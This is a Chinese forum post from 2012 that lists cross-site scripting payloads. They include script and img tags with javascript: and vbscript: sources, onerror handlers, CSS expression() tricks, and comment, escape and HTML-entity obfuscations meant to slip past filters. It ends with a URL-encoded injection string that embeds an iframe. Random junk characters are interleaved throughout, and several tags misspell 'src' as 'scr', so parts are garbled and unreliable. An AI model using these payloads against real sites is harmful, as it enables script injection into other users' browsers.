<script>alert("跨站")</script> (最常用): O2 r7 G F# ?8 q0 B
<img scr=javascript:alert("跨站")></img>( I. D9 e7 h1 A" \
<img scr="javascript: alert(/跨站/)></img>! H) o8 r) x5 b' n v$ c
<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
m7 r/ r+ g" t! l3 E<img scr="#" onerror=alert(/跨站/)></img>
* }- M! b. F! M8 ~# B2 [; L<img scr="#" style="xss:expression(alert(/xss/));"></img>( z3 w: G! M* [# H% B
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
# O1 ]" Q& S: @* Z Y. \3 R. h( W<img src=vbscript:msgbox ("xss")></img>
% P% I" M$ F. `1 S<style> input {left:expression (alert('xss'))}</style>
, o9 } p. q! Y<div style={left:expression (alert('xss'))}></div>
8 o* N: p7 _* e* J7 j ^! I1 A<div style={left:exp/* */ression (alert('xss'))}></div>
: L" R0 ^* b6 @- H9 X8 u<div style={left:\0065\0078ression (alert('xss'))}></div>
1 f; _; c- R$ T( {html 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>
0 f% q4 W, L) Z. C2 [1 tunicode <div style="{left:expRessioN (alert('xss'))}">! r/ e: v9 b6 p) Q+ B6 x& w6 e! B1 \) L
* c& c+ u! m% I" t9 \( y6 I, C
"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>["
& x6 c( E. G6 a5 Q# [4 S; s3 N |
发表于 2012-9-13 17:15:04
收藏
支持
反对